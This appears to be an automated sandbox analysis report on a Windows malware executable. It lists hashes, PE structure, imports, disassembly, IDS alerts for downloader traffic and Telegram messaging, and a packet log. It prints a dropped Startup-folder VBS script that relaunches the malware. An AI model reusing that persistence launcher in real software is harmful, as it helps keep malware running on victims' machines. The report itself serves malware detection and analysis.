Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L...3.`g.........."..........D......w.............@..........................P............@...@.......@.....................d...\|....@..........................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc.......@......................@..@.reloc...u.......v...~..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs

Download File

Process:	C:\Users\user\AppData\Local\Thebesian\reindulgence.exe
File Type:	data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	3.4100990617315317
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclo5ZsUEZ+lX105WlMhwrCaaB6nriIM8lfQVn:DsO+vNlzQ105Weh4mA2n
MD5:	29AA78045A295D01FADB84CF54724F93
SHA1:	A80C8764B5708AE600F277BCD9B5E78F811510BF
SHA-256:	E383458BE970661EBC4177099670F16F05F25C9DEBF42D7BEBA3410F716916D8
SHA-512:	941317B225C70CEC7ED78538A37491E9F06931E9058B7A4C65418994A57876E298AE8482260C9489F574E3855CDAB687DBE27BE902F23A801E8446338A1C8B53
Malicious:	true
Reputation:	low
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.h.e.b.e.s.i.a.n.\.r.e.i.n.d.u.l.g.e.n.c.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.970676610649293
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	oagkiAhXgZ.exe
File size:	1'111'040 bytes
MD5:	eb8c8acae9d3a669129902384f5335b2
SHA1:	f0f9aa5f20c2721eacc7e2b660c46b585b653ee2
SHA256:	fef805cfe8df23b5e42e59c3505ba7b9014c2cf3e9ac9346b3badba3c086053c
SHA512:	5c62016f2b7b6fbfdba82539effc1c9dd65e0a3bc0df92210637d500562cfae01572866578a57d080c3247433da0f5845688adef74fd7467d08c7ba564c74fa3
SSDEEP:	24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8aeMExfQ:9TvC/MTQYxsWR7aeMk
TLSH:	1635AE027391C072FF9B91334B5AF76146BCAD260123A51F13982DBABE701B1567E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	74f0d4d4d4d4d4cc

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6760BA33 [Mon Dec 16 23:39:31 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F4364BFFC53h
jmp 00007F4364BFF55Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F4364BFF73Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F4364BFF70Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F4364C022FDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F4364C02348h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007F4364C02331h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x388e4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10d000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x388e4	0x38a00	ebd35cb479881ea53e15418b002b1bc2	False	0.8979804773730684	data	7.827364837668468	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10d000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd43e0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4508	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	Great Britain	0.19060283687943264
RT_ICON	0xd4970	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	Great Britain	0.11429872495446267
RT_ICON	0xd5a98	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	Great Britain	0.07211147274206672
RT_ICON	0xd8100	0x1952	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	Great Britain	0.7099660598580685
RT_STRING	0xd9a54	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xd9fe8	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xda674	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdab04	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdb100	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdb75c	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdbbc4	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdbd1c	0x306a5	data			1.0003580271192936
RT_GROUP_ICON	0x10c3c4	0x3e	data	English	Great Britain	0.8548387096774194
RT_GROUP_ICON	0x10c404	0x14	data	English	Great Britain	1.15
RT_VERSION	0x10c418	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x10c4f4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll	EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll	DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-08T15:44:05.738136+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	132.226.247.73	80	TCP
2025-01-08T15:44:06.722541+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49704	132.226.247.73	80	TCP
2025-01-08T15:44:07.334959+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49706	188.114.96.3	443	TCP
2025-01-08T15:44:08.066253+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49707	132.226.247.73	80	TCP
2025-01-08T15:44:08.719105+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49708	188.114.96.3	443	TCP
2025-01-08T15:44:10.024728+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49710	188.114.96.3	443	TCP
2025-01-08T15:44:15.290825+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49718	188.114.96.3	443	TCP
2025-01-08T15:44:17.531327+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.5	49726	149.154.167.220	443	TCP
2025-01-08T15:44:22.284959+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49754	132.226.247.73	80	TCP
2025-01-08T15:44:23.456846+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49754	132.226.247.73	80	TCP
2025-01-08T15:44:24.025560+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49766	188.114.96.3	443	TCP
2025-01-08T15:44:24.753710+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49772	132.226.247.73	80	TCP
2025-01-08T15:44:29.389726+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49810	188.114.96.3	443	TCP
2025-01-08T15:44:34.287910+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.5	49844	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 15:44:04.765481949 CET	49704	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:04.770286083 CET	80	49704	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:04.770380020 CET	49704	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:04.770581961 CET	49704	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:04.775333881 CET	80	49704	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:05.471961975 CET	80	49704	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:05.476053953 CET	49704	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:05.485153913 CET	80	49704	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:05.693861008 CET	80	49704	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:05.738136053 CET	49704	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:05.754703045 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:05.754745960 CET	443	49705	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:05.754811049 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:05.761123896 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:05.761140108 CET	443	49705	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:06.239515066 CET	443	49705	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:06.239603043 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:06.246465921 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:06.246490002 CET	443	49705	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:06.246864080 CET	443	49705	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:06.300599098 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:06.315809011 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:06.363333941 CET	443	49705	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:06.440931082 CET	443	49705	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:06.440998077 CET	443	49705	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:06.441052914 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:06.447468996 CET	49705	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:06.450648069 CET	49704	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:06.455471039 CET	80	49704	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:06.668267965 CET	80	49704	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:06.670399904 CET	49706	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:06.670434952 CET	443	49706	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:06.670492887 CET	49706	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:06.670775890 CET	49706	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:06.670785904 CET	443	49706	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:06.722541094 CET	49704	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:07.150996923 CET	443	49706	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:07.153856039 CET	49706	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:07.153883934 CET	443	49706	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:07.334969044 CET	443	49706	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:07.335038900 CET	443	49706	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:07.335120916 CET	49706	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:07.335602999 CET	49706	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:07.338872910 CET	49704	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:07.340197086 CET	49707	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:07.343853951 CET	80	49704	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:07.343924046 CET	49704	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:07.344984055 CET	80	49707	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:07.345077038 CET	49707	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:07.345136881 CET	49707	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:07.349910021 CET	80	49707	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:08.017226934 CET	80	49707	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:08.018481016 CET	49708	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:08.018516064 CET	443	49708	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:08.018574953 CET	49708	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:08.018822908 CET	49708	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:08.018832922 CET	443	49708	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:08.066252947 CET	49707	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:08.555248976 CET	443	49708	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:08.556811094 CET	49708	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:08.556833982 CET	443	49708	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:08.719118118 CET	443	49708	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:08.719182968 CET	443	49708	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:08.719230890 CET	49708	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:08.725769043 CET	49708	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:08.735691071 CET	49709	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:08.740514040 CET	80	49709	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:08.740601063 CET	49709	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:08.791681051 CET	49709	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:08.796582937 CET	80	49709	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:09.412719965 CET	80	49709	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:09.414350986 CET	49710	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:09.414398909 CET	443	49710	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:09.414454937 CET	49710	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:09.414696932 CET	49710	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:09.414715052 CET	443	49710	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:09.456845045 CET	49709	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:09.872608900 CET	443	49710	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:09.874330044 CET	49710	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:09.874349117 CET	443	49710	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:10.024751902 CET	443	49710	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:10.024825096 CET	443	49710	188.114.96.3	192.168.2.5
Jan 8, 2025 15:44:10.024899960 CET	49710	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:10.025369883 CET	49710	443	192.168.2.5	188.114.96.3
Jan 8, 2025 15:44:10.028876066 CET	49709	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:10.029479027 CET	49711	80	192.168.2.5	132.226.247.73
Jan 8, 2025 15:44:10.033891916 CET	80	49709	132.226.247.73	192.168.2.5
Jan 8, 2025 15:44:10.034262896 CET	80	49711	132.226.247.73	192.168.2.5
